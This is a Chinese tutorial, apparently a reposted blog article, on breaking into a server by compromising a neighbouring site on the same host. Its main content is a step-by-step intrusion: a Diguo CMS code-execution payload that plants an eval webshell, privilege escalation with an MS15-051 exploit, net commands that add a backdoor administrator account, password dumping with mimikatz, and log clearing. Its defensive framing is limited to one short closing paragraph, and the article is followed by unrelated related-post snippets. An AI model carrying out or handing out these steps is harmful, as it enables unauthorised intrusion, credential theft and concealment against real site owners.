【未知攻焉知防】如何利用旁注渗透入侵服务器站点
1. 概述
此文原出自【爱运维社区】: http://www.easysb.cn
旁注(旁站,其实是同一个意思),顾名思义,就是从旁边的站点注入,是渗透入侵常用的一种手段。通常,一台服务器上有很多个站点,这些站点之间没有必然的联系,是相互独立的,使用的是不同的域名(甚至端口都不同),但是它们却共存在一台服务器上。
如果我们要对某一个站点进行直接渗透无法突破时,那么我们可以对同服务器的其他站点进行渗透,只要能打破一个缺口,就能沦陷服务区上的整个站点,甚至是一个集群。
我们这次以实际的一个站点为例,简要阐述一下旁注的渗透原理及其危害。
2. 旁注渗透
我们这次以某站点www.xxxx168.com 为例, 阐述一下旁注的原理及其危害(请勿对实例站点进行攻击)
2.1 获取同服务器的旁站
我们打开某网站,其页面如下:
简单ping一下该网站,得到该网站的IP地址为 xxx.xxx.152.76.
打开IP反查域名网站 http://dns.aizhan.com/ ,找出该IP上所绑定的域名信息,然后我们可以得到该IP上有6个域名绑定在上面。
2.2 寻找突破点
在上面的6个站点中,我们只要突破一个站点就可以把整个服务器拿下来。至于怎么找突破点,每个人都每个人的方法,只要你耐心寻找。比如,在上面的6个站点中,我发现有个站点采用的是帝国cms,而且后台是弱密码,我就直接进去了。
2.3 利用突破点拿shell
由于帝国cms系统模型中存在一个代码执行的漏洞,我们可以利用此漏洞拿到webshell。打开系统=>数据表与系统模型=》管理数据表=》管理系统模型
在本地新建一个文件,文本内容为<?fputs(fopen("x.php","w"),"<?eval(\$_POST[cmd]);?>")?> 再命名为1.php.mod
导入这个1.php.mod文件,数据表名写个tmpxxxx(注意别重复),然后就会执行里面的php代码,在ecmsmod.php的相同目录下生产x.php的一句话木马文件,即在路径e/admin/x.php。
我们使用菜刀连过去,测试一句话写入成功!
2.4 提权
使用菜刀发现无法执行cmd指令,应该设置了安全模式,所以我们得想个其他的办法:
·上PHP大马,无法执行 :)
· 上ASP大马,还是无法执行 :)
· 最后上ASPX大马,提示找不到文件,然后我们就上传cmd.exe到web目录下, 发现可以执行了,用户是service,还不是管理员,如下图所示:
我们查看一下系统的信息,发现是WIN2003的VPS, 应该是32位的机器
然后然后我们就上传32位的提权工具(MS15-051)上去(当然你可以用其他的提权工具),执行whoami,发现提权成功已经是system权限了。
然后分别执行一下两条命令,添加一个用户testabc,
net user testabc password /add net localgroup administrators testabc /add
2.5 查找远程连接端口
在添加完用户之后,使用远程桌面工具(mstsc)无法连接,初步判断应该端口不是绑定在3389了,这时候我们得查找连接端口。执行一下命令:
tasklist /svc
然后找到TermService进程对用PID号为2060,如下图:
然后再找PID 2060所对应的端口号,执行一下命令:
netstat /ano | findstr 2060
最终找到该服务器的远程连接端口为65138.
2.6 获取管理员密码
使用远程桌面工具,连接上去,OK!
使用mimikatz工具(网上有很多一键抓取的工具都可以使用),抓取管理员的明文密码,如下:
2.7. 清除记录
清除记录一般有以下的内容:
1. Web日志
2. 删除木马,提权exp等工具
3. 删除测试账户testabc
4. 系统日志记录
2.8 安全防护
安全不是一个点的问题,而是一个立体的的问题,任何细小的漏洞都有可能导致蝴蝶效应,造成极大的危害。而很多安全问题,并不是系统本身的问题,大部分是相关人员没有任何安全意识造成的,所以加强安全意识,积极部署安全防护系统才可以很大程度上保证系统的安全。
作者:胡杨< jekkay@easysb.cn >< 479904359@qq.com >
此文原出自【爱运维社区】: http://www.easysb.cn
如转载请标明原出处,谢绝阉割党。
【未知攻焉知防】如何利用旁注渗透入侵服务器站点相关推荐
- 【2·未知攻焉知防】 如何利用SQL注入,结合图片马渗透入侵服务器
1. 概述 此文原出自[爱运维社区]: http://www.easysb.cn SQL注入漏洞是由于对字符串的过滤不严格导致的,根据数据外带方式不同,可分为时间盲注,bool盲注,错误等等很多种. ...
- Fireeye前副总裁卜峥 :不知攻焉知防,打造“3C的安全体系结构”
一年一度的阿里安全峰会创立于 2014 年,今年已是第三届,于7月13-14日在北京国家会议中心举办.峰会旨在促进亚太区信息安全行业发展,为本地区信息安全组织.信息安全专业人士和决策者搭建一个信息交流 ...
- “未知攻,焉知防”,业务安全的攻防之道
2013年秋天的一次网络安全大会上,知名网络安全专家于旸做了一个<APT防御--未知攻,焉知防?>主题分享.那一年,2013年,APT高级可持续威胁攻击被行业高度关注,PaloAlto与F ...
- 黑客攻学兼防(固顶)
序章:开始学习黑客之前. 第一节.黑客的种类和行为 以我的理解,"黑客"大体上应该分为"正"."邪"两类,正派黑客依靠自己掌握的知识 ...
- 1500万公开服务易受 CISA 已知已遭利用漏洞攻击
聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 Rezilion 公司发布报告称,超过1500万家公开服务至少易受CISA 已知已利用漏洞 (KEV) 分类清单(共896个)中一种漏洞的影响. ...
- 1.已知本原多项式,利用Matlb中的simulink构成m序列产生器。2.已知任意本原多项式,利用matlb软件编程求解其对应的m序列以及m序列产生过程。
1. 已知本原多项式,利用Matlb中的simulink构成m序列产生器.2.已知任意本原多项式,利用matlb软件编程求解其对应的m序列以及m序列产生过程. m序列是最长线性反馈移位寄存器的简称,他 ...
- 医院综合安防系统为何要把网络服务器NTP时钟同步?
医院综合安防系统为何要把网络服务器NTP时钟同步? 医院综合安防系统为何要把网络服务器NTP时钟同步? 平安医院系统建设的最终目标是实现以物联网信息技术为支撑,建成覆盖整个医院的网络互联互通.信息资源 ...
- Windows 远程控制(经典IPC$入侵、psexec类工具、利用WMI远程入侵、PsRemoting远程命令执行、使用wmic命令远程执行)
一.经典IPC$入侵 利用ipc$和默认共享入侵远程电脑的过程 1. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名&qu ...
- 利用Bash给Linux服务器增添色彩
利用Bash给Linux服务器增添色彩 方法很简单,即在/root/.bashrc下添加一行 PS1="\[\e[37;40m\][\[\e[32;40m\]\u\[\e[37;40m\]@ ...
最新文章
- JUNOS LDP标签分发过程详解
- Redis分布式锁【正确实现方式】
- Elastic 使用Heartbeat监测服务运行状态
- BOOST_PP_CHECK_EMPTY宏相关的测试程序
- 小程序获取列表的下标
- apache目录遍历漏洞利用_Apache漏洞—多后缀名解析、目录遍历和(CVE-2017-15715)
- 技巧收藏|10个JavaScript常用数组操作方法
- linux memcpy 效率,memcpy每秒字节速率
- python def函数报错详解_JSer 快速入门 Python 之函数详解
- Android签名证书
- php mysql_fetch_array 函数大全,深入探讨PHP mysql_fetch_array()函数
- 科学技术的不完备性及其实践意义
- 漫谈Java IO之 NIO那些事儿
- dubbogo PMC何鑫铭:没有热爱就做不成这件事情
- Labview模拟温度检测报警系统
- Java工具集-数学(圆柱体,椎体工具类)
- loj10099 矿场搭建
- png图片怎么转换成jpg?快速转换教程来了
- 引用防删——JAVA设计模式总结之六大设计原则
- 域 用户和计算机名,域环境中计算机名称解析